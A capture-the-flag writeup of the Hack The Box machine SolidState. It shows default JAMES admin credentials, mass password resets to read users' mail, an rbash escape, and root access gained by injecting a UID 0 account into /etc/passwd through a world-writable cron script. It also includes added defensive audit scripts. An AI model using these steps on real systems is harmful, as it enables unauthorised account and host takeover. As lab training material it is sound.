Welcome to the SolidState writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
SolidState
tags: HTB, Medium, Linux, OSCP
Platform: Hackthebox
Difficulty: Medium
OS: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:35 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Nmap done: 1 IP address (1 host up) scanned in 76.06 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:39 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.7 [10.10.14.7]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 92.98 ms 10.10.14.1
2 93.12 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.34 seconds
JAMES Remote Admin
A quick search shows that the default credentials for the JAMES Remote Administration Tool are root:root, and they still work here!
# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
Let's see what users there are.
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Exploitation
Well, we are going to reset the password of every account and read their emails.
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset
Let's add the accounts to Thunderbird.
As we can see, John has a message in his inbox.
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a temporary password to login to her accounts.
Thank you in advance.
Respectfully,
James
And mindy has two messages.
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our organization. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
In this one, we find credentials!
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
We are going to connect by SSH with these credentials.
# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
............................................................................
............................................................................
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names
mindy@solidstate:~$
Okay... we are jailed... Well, let's get away 🤷🏻‍♂️
Jail escape
Running compgen -c we can see which commands are available to us.
cat is one of them, so give me the user's flag!
mindy@solidstate:~$ cat user.txt
CENSORED_FLAG
Trying to escape through SSH... Done! This works because sshd hands the requested command to the login shell, and rbash only rejects command names containing a slash, so a plain bash found on PATH goes through.
# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
Post exploitation
Enumeration
Pspy
Running pspy, we see a script being executed as root (UID=0):
2021/03/23 15:54:01 CMD: UID=0 PID=14955 | /bin/sh -c python /opt/tmp.py
Wow! We can edit the script! So we are going to inject a user with root privileges into /etc/passwd.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
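The root cause here is a root-executed script that any user can modify. As an added audit example (not part of the original writeup), the following script parses pspy-style log lines, keeps the commands run as UID 0, and reports any referenced file whose ownership or mode lets non-root users change it; the log lines and the 0777 file in demo() are constructed for the demonstration.

```python
import os, re, stat, tempfile

# pspy lines look like: "<date> <time> CMD: UID=<n> PID=<n> | <command line>"
PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+)\s+PID=\d+\s+\|\s+(?P<cmd>.+)$")
PATH_RE = re.compile(r"(?<!\S)(/[\w./-]+)")  # absolute paths in the command
INTERPRETERS = {"/bin/sh", "/bin/bash", "/usr/bin/python", "/usr/bin/python3"}

def root_scripts(log_lines):
    """Absolute paths of existing files referenced by commands run as UID 0."""
    paths = set()
    for line in log_lines:
        m = PSPY_RE.search(line)
        if not m or m.group("uid") != "0":
            continue
        for p in PATH_RE.findall(m.group("cmd")):
            if p not in INTERPRETERS and os.path.isfile(p):
                paths.add(p)
    return paths

def weak_permissions(path):
    """Why others could tamper with a root-executed file, or None if it is fine."""
    st = os.stat(path)
    problems = []
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        problems.append("writable by non-root group %d" % st.st_gid)
    if st.st_uid != 0:
        problems.append("owned by uid %d, not root" % st.st_uid)
    return ", ".join(problems) or None

def audit(log_lines):
    """Map every root-executed script to its permission problem (None = OK)."""
    return {p: weak_permissions(p) for p in root_scripts(log_lines)}

def demo():
    """Constructed scenario: a mode-0777 script named in a UID=0 command line."""
    fd, path = tempfile.mkstemp(suffix=".py")
    os.close(fd)
    os.chmod(path, 0o777)  # the mode /opt/tmp.py had on the box
    lines = [
        "2021/03/23 15:54:01 CMD: UID=0 PID=14955 | /bin/sh -c python " + path,
        "2021/03/23 15:54:01 CMD: UID=1001 PID=14960 | python " + path,
    ]
    try:
        return audit(lines).get(path)
    finally:
        os.remove(path)
```

On a real host, pipe a saved pspy capture through audit(); a script that should only ever be touched by root must come back as None.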
Privilege escalation
Okay, let's add our code to the script.
#!/usr/bin/env python
import os
import sys

# Append our UID 0 account to /etc/passwd, but only once
passwd = open('/etc/passwd', 'r').readlines()
if not any('x4v1l0k' in s for s in passwd):
    output = open('/etc/passwd', 'a')
    output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash\n')
    output.close()

# Existing contents of the script, left untouched
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
2021/03/23 16:06:01 CMD: UID=0 PID=932 | /bin/sh -c python /opt/tmp.py
2021/03/23 16:06:01 CMD: UID=0 PID=933 | python /opt/tmp.py
Perfect, the script has been executed. We are going to check if the user has been injected and in that case to authenticate with it.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/passwd | tail -n 1
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ su x4v1l0k
Password:
root@solidstate:/home/mindy# id
uid=0(root) gid=0(root) groups=0(root)
root@solidstate:/home/mindy# cat /root/root.txt
CENSORED_FLAG
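The injected entry is easy to spot if anyone looks: it is a second UID 0 account and it carries its password hash in /etc/passwd instead of /etc/shadow. As an added detection example (not the writeup's code), this parser flags both conditions, plus empty passwords and malformed lines; the sample file is constructed, with the writeup's injected line as its last entry.

```python
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mindy:x:1001:1001:mindy,,,:/home/mindy:/bin/rbash
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
"""

def audit_passwd(text):
    """Return (line number, reason) findings for a passwd-format file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((lineno, "non-numeric uid for %s" % name))
        elif int(uid) == 0 and name != "root":
            findings.append((lineno, "extra UID 0 account: %s" % name))
        if pw == "":
            findings.append((lineno, "empty password for %s" % name))
        elif pw not in ("x", "*", "!", "!!"):
            # Anything else is a hash kept in passwd itself, bypassing /etc/shadow
            findings.append((lineno, "password hash inline for %s" % name))
    return findings
```

On a live host, feed it open('/etc/passwd').read(); a clean shadow-enabled system returns an empty list.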
That's all folks!